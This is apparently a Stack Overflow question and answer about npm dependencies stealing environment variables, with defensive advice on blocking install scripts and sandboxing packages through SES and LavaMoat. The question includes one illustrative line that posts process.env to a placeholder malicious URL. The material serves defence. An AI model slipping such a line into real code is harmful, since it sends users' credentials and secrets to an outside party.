# How to check if any npm packages are stealing environment variables from my system?

Tags: javascript, node.js, security, npm

Forgive me if this is senseless. But adding a line like this:

```js
// to convey the idea I'm using https://www.npmjs.com/package/got
got.post(maliciousUrl, {json: process.env})
```

isn't enough to send the env vars to an un intended place?

So if a package I install has a code like this in it, am I in danger?

But even if I decided to be cautious when installing dependencies, any of the nested dependencies of that dependency contains such a malicious script, I'll again be in danger. How can we detect this and prevent any possibility of this?

I'm aware of the npm/github security teams' and the communities' valuable efforts to avoid these kinds of situations.

But a well [obfuscated](https://www.google.com/search?q=obfuscate+meaning) line in a deep dependency may not be easily detected.

Comment: Well at the end of the day you're running someone else's code on your machine, and unlike browsers which sandbox the code, for Node it has access to the local machine. So yes they could steal your environment variables, or post files on your system somewhere, or delete shit, or any other numbers of things. In terms of how to reduce risk, there's lots of things. Using tools like Snyk, restricting the applications disk access, locking your dependencies, and more. You'd just have to Google something like "node prevent malicious code" and start reading

Comment: Three choices: 1) Trust that popular packages on NPM are not malicious or they would have been discovered and banned, 2) Inspect every line of code you put on your system, including dependencies to satisfy yourself that there's nothing nefarious or obfuscated, 3)  Run your code (during the test phase) in an isolated VM and monitor all outgoing network connections.  I choose option #1 and if I'm interested in a less popular package I look at the code and dependencies.

Comment: @Jayce444 See what just happened with node-ipc! Just like you said! https://twitter.com/bantg/status/1504213698658938881

Comment: @Wajahath lol yup, such is the risk of the NPM environment. It's just an operational hazard you gotta deal with as a front end/Node developer!

Answer (score 0):

Answering your questions in order:

- it is enough to steal your credentials from env vars
- Yes, everyone was always in that danger and the number of packages doing this is increasing recently
- there is a way to protect against it.

### How to protect a project from malicious packages

1. make sure you don't run lifecycle (postinstall) scripts unless they're known and necessary (see my [talk on this topic](https://www.youtube.com/watch?v=y2p1e7UmGYY))
2. put 3rdparty code in a compartment, lock down the environment, decide on which powerful APIs to pass to each package.

The second step requires the use of Compartment, which is a work-in-progress in TC39 https://github.com/tc39/proposal-compartments/

But a shim exists. And Some tooling was built on top of that shim.

You could use the [SES-shim](https://github.com/endojs/endo/tree/master/packages/ses) directly and implement your own controls, or use the convenience of [LavaMoat](https://github.com/LavaMoat/LavaMoat#how-to-secure-your-app-against-supplychain-attacks)

[LavaMoat](https://github.com/LavaMoat/LavaMoat#how-to-secure-your-app-against-supplychain-attacks) lets you generate and tweak a per-package policy where you can decide which globals and builtins it should have access to.
LavaMoat also offers a tool to manage install scripts.

Here's my [talk on SES and LavaMoat](https://www.youtube.com/watch?v=Qjeh7Qo2u28) with a demo at the end.

### How to set up LavaMoat

*See LavaMoat docs for more details*

1. disable/allow dependency lifecycle scripts (eg. "postinstall") via @lavamoat/allow-scripts

```
npm i --ignore-scripts -D @lavamoat/allow-scripts
npx --no-install allow-scripts setup
npx --no-install allow-scripts auto
```

- then, edit the allow-list in package.json
- after every insstall/reinstall run `allow-scripts`

3. run your server or build process in lavamoat-node

```
npm i -D lavamoat
```

in your package.json add something like:

```
"scripts": {
  "lavamoat-policy": "lavamoat app.js --autopolicy",
  "start": "lavamoat app.js"
```

- run lavamoat-policy every time you make changes to your dependency tree and review the policy (see also: policy override)
- run `npm start` to start your app

---

> Disclaimer: I contribute to LavaMoat and Endo. They are Open Source projects on permissive licenses.